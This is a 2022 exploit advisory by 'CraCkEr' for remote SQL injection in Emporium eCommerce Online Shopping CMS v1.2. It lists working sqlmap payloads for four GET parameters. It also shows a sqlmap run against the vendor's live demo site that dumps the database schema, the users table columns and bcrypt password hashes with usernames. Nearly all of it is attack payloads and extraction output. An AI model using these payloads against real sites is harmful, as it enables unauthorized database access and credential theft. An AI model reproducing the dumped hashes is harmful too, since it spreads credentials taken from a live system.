Authored by CraCkEr

Emporium eCommerce Online Shopping CMS version 1.2 suffers from a remote SQL injection vulnerability.

┌┌────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : mybizcms.com │ │ │
│ Vendor : mybizcms │ │ │
│ Software : Emporium eCommerce - │ │ │
│ Online Shopping CMS v 1.2 │ │ Emporium eCommerce │
│ Vuln Type: Remote SQL Injection │ │ │
│ Method : GET │ │ is a complete online │
│ Critical : High [░░▒▒▓▓██] │ │ shopping platform for all your needs │
│ Impact : Database Access │ │ │
│ │ │ │
│ ────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘

There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?


GET parameter 'min_price' is vulnerable

---
Parameter: min_price (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
---

GET parameter 'percentage' is vulnerable.

---
Parameter: percentage (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
Payload: percentage=MAKE_SET(4728=4728,5649)

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
---

GET parameter 'review_ratings' is vulnerable

---
Parameter: review_ratings (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
---

GET parameter 'brand[]' is vulnerable

---
Parameter: brand[] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: brand[]=15');SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc
---

Live Demo Site:

https://mybizcms.com/demos/multivendor/


[+] Starting the Attack

sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: 'mybizcms_multivendor'


fetching tables for database: 'mybizcms_multivendor'
[101 tables]

+--------------------------+
| returns |
| ad_placements |
| addresses |
| ads |
| attribute_items |
| attributes |
| authorize_net_settings |
| brands |
| categories |
| collections |
| company |
| counties |
| countries |
| credit_card_types |
| cronjobs |
| customers |
| deliveries |
| delivery_items |
| delivery_options |
| delivery_status |
| discounts |
| email_templates |
| facebook_settings |
| faqs |
| flash_sale_items |
| flash_sales |
| flutterwave_settings |
| github_settings |
| google_settings |
| item_status |
| labels |
| linkedin_settings |
| logs |
| media |
| mpesa_settings |
| newsletters |
| notifications |
| options |
| order_details |
| order_items |
| order_status |
| orders |
| pages |
| payment_options |
| payment_status |
| payments |
| payout_modes |
| payout_status |
| payouts |
| paypal_pro_settings |
| paypal_standard_settings |
| paytm_settings |
| payu_money_settings |
| permissions |
| pesapal_settings |
| pickup_stations |
| post_categories |
| post_comments |
| posts |
| product_attributes |
| product_images |
| product_reviews |
| product_stock |
| product_types |
| product_variants |
| product_wholesales |
| products |
| quicks |
| return_reasons |
| return_status |
| rewards |
| role_sub_permissions |
| roles |
| saved_items |
| sessions |
| shipping_fees |
| shipping_regions |
| shipping_weights |
| shops |
| sliders |
| stripe_settings |
| sub_permissions |
| subscribers |
| supported_currencies |
| tags |
| taxes |
| temp_data |
| ticket_priority |
| ticket_replies |
| ticket_status |
| tickets |
| timezones |
| twitter_settings |
| twocheckout_settings |
| user_status |
| user_sub_permissions |
| users |
| variant_choices |
| variant_options |
| wallets |
| weights |
+--------------------------+

fetching columns for table 'users' in database 'mybizcms_multivendor'

Table: users
[34 columns]

+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| calling_code | varchar(11) |
| city | varchar(100) |
| company | varchar(100) |
| country_id | int(11) |
| date_added | datetime |
| default_billing | int(11) |
| default_currency | int(11) |
| default_language | varchar(40) |
| default_shipping | int(11) |
| department_id | int(11) |
| email | varchar(100) |
| firstname | varchar(50) |
| last_ip | varchar(40) |
| last_login | datetime |
| last_password_change | datetime |
| lastname | varchar(50) |
| latitude | varchar(300) |
| longitude | varchar(300) |
| new_pass_key_requested | datetime |
| passkey | varchar(32) |
| password | varchar(256) |
| payout_address | longtext |
| payout_mode_id | int(11) |
| phone | varchar(30) |
| postal_code | varchar(100) |
| profile_image | varchar(150) |
| role_id | int(11) |
| state | varchar(50) |
| street | varchar(100) |
| user_id | int(11) |
| user_status_id | int(11) |
| user_uid | varchar(50) |
| username | varchar(100) |
| zip_code | varchar(15) |
+------------------------+--------------+

fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'

Database: mybizcms_multivendor
Table: users
[7 entries]

+----------+--------------------------------------------------------------+------------------------+
| username | password | email |
+----------+--------------------------------------------------------------+------------------------+
| admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | [email protected] |
| one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | [email protected] |
| two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | [email protected] |
| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | [email protected] |
| three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | [email protected] |
| user | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | [email protected] |
| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | [email protected] |
+----------+--------------------------------------------------------------+------------------------+



[-] Done